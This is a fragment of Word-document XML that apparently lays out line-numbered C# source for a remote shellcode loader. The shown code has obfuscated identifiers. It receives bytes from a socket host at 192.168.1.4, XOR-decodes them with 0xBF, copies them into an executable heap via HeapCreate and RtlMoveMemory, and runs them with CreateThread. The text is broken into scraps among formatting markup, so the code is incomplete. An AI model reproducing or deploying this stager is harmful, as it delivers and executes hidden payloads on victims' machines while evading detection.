7348,9489,7348,9488,7348,9486,7348,9485,7348,9484,7348,9482,7348,9481,7348,9479,7348,9478,7348,9476,7348,9474,7348,9473,7348,9471,7348,9469,7348,9467,7348,9465,7348,9463,7348,9461,7348,9459,7348,9457,7348,9455,7348,9452,7348,9450,7348,9447,7348,9445,7348,9442,7348,9440,7348,9437,7348,9434,7348,9431,7348,9428,7348,9425,7348,9422,7348,9419,7348,9416,7348,9412,7348,9409,7348,9406,7348,9402,7348,9398,7348,9395,7348,9391,7348,9387,7348,9383,7348,9379,7348,9375,7348,9371,7348,9366,7348,9362,7348,9357,7348,9353,7348,9348,7348,9343,7348,9338,7348,9334,7348,9328,7348,9323,7348,9318,7348,9313,7348,9307,7348,9302,7348,9296,7348,9290,7348,9284,7348,9279,7348,9272,7348,9266,7348,9260,7348,9254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33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int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jbQtneZFbvzK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BitConverter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ToInt32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VKQsLPgLmVdp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34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cyDiPLJhiAQbw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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jbQtneZFbvzK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35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int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vyPloXEDJoylLbj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while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vyPloXEDJoylLbj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16"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;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jbQtneZFbvzK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37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="5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vyPloXEDJoylLbj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15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+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LbLgipot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Receive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cyDiPLJhiAQbw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vyPloXEDJoylLbj</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38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jbQtneZFbvzK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vyPloXEDJoylLbj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4096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?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jbQtneZFbvzK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vyPloXEDJo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ylLbj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4096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38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MkHUcy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BitConverter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GetBytes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int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LbLgipot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Handle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39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Array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Copy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MkHUcy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cyDiPLJhiAQbw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cyDiPLJhiAQbw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0xBF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40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return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cyDiPLJhiAQbw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}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void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ZFeAPdN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hjErkNfmkyBq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{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42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if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hjErkNfmkyBq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!=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null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43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xYfliOUgksPsv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16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HeapCreate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0x00040000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hjErkNfmkyBq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ngth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;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44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eSiulXLtqQO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1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HeapAlloc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xYfliOUgksPsv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0x00000008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hjE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rkNfmkyBq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Length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4821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45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RtlMoveMemory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eSiulXLtqQO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hjErkNfmkyBq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hjErkNfmkyBq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Length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46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NByrFgKjVjB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47</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="2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IntPtr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PsIqQCvc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CreateThread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eSiulXLtqQO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IntPtr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Zero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ref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NByrFgKjVjB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56" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="434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48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WaitForSingleObject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PsIqQCvc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0xFFFFFFFF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}}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49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50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public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void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BBNSohgZXGCaD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51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cyDiPLJhiAQbw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null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cyDiPLJhiAQbw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SVMBrK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"192.168.1.4"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,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>53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52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ZFeAPdN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cyDiPLJhiAQbw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53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0" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/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